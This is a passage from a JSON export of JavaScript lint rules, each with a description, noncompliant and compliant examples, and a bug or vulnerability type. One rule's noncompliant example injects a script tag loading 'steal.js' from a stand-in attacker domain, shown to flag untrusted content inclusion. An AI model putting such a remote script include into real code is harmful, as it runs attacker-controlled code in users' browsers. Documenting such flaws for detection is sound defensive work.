doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50)) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doFirstThing();\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) { \/\/ Noncompliant\n \/\/ ...\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++, j++) {\n \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i < 10; i++) {\n \/\/ ...\n j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined; \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\"; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(dividend, divisor); \/\/ Noncompliant; operation succeeds, but result is unexpected\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(divisor, dividend);\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i--) { \/\/ Noncompliant;\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i++) {\n \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var i; \/\/ Noncompliant; should be declared in if-block\n if (a > b) {\n i = a;\n console.log(i);\n var x = a - b; \/\/ Noncompliant; should be declared outside if-block\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var x = a - b;\n\n if (a > b) {\n var i = a;\n console.log(i);\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n URIError <\/li>\n <li> Numbers and dates - Number, Math, Date <\/li>\n <li> Text processing - String, RegExp <\/li>\n <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n Float64Array <\/li>\n <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n <li> Control abstraction objects - Promise <\/li>\n <li> Reflection - Reflect, Proxy <\/li>\n <li> Internationalization - Intl <\/li>\n <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\"); \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n return 42; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n 'first name': 'Bob', \/\/ Noncompliant\n 'birth date': new Date() \/\/ Noncompliant\n },\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n firstName: 'Bob',\n birthDate: new Date()\n },\n });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n doSomething();\n} else {\n doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n doSomething();\n}\n\nif (b && a) { \/\/ Noncompliant; \"a\" is always \"true\"\n doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n doSomething();\n}\n\nif (b) {\n doSomething();\n}\n\nif (c) {\n doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n var s = document.createElement(\"script\");\n s.setAttribute(\"type\", \"text\/javascript\");\n s.setAttribute(\"src\", url);\n document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\") \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) { \/\/ Noncompliant; always false\n console.log(\"a is not a number\"); \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues >0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") > 0) { \/\/ Noncompliant\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > 0 { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") >= 0) {\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > -1) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\"); \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\"); \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n <p>Beginning your selector with an ID is always best.<\/p>\n <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n <li> <code>.andSelf()<\/code> <\/li>\n <li> <code>.context<\/code> <\/li>\n <li> <code>.die()<\/code> <\/li>\n <li> <code>.error()<\/code> <\/li>\n <li> <code>jQuery.boxModel<\/code> <\/li>\n <li> <code>jQuery.browser<\/code> <\/li>\n <li> <code>jQuery.sub()<\/code> <\/li>\n <li> <code>jQuery.support<\/code> <\/li>\n <li> <code>.live()<\/code> <\/li>\n <li> <code>.load()<\/code> <\/li>\n <li> <code>.selector<\/code> <\/li>\n <li> <code>.size()<\/code> <\/li>\n <li> <code>.toggle()<\/code> <\/li>\n <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. (It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. According to the specification:<\/p>\n<blockquote>\n Authors should not use the wildcard keyword (\n <code>*<\/code>) in the\n <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. <\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2]; \/\/ Noncompliant. myArray => ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1); \/\/ myArray => ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo(); \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo(); \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:<element_type><\/code> and <code>[type=\"<element_type>\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"<element_type>\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n <li> <code>:checkbox<\/code> <\/li>\n <li> <code>:file<\/code> <\/li>\n <li> <code>:image<\/code> <\/li>\n <li> <code>:password<\/code> <\/li>\n <li> <code>:radio<\/code> <\/li>\n <li> <code>:reset<\/code> <\/li>\n <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1; \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) { \/\/ Compliant\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n this.foo = 1;\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) {\n \/\/ ...\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass; \/\/ Noncompliant;\nvar obj2 = new MyClass(); \/\/ Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = function(){\n this.prop = 1;\n}\n\nvar obj1 = new someClass; \/\/ Compliant\nvar obj2 = new MyClass(); \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 1;\ndelete x; \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n x:1,\n foo: function(){\n ...\n }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n return p.gender==Person.MALE?\"Mr. \":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName(); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n 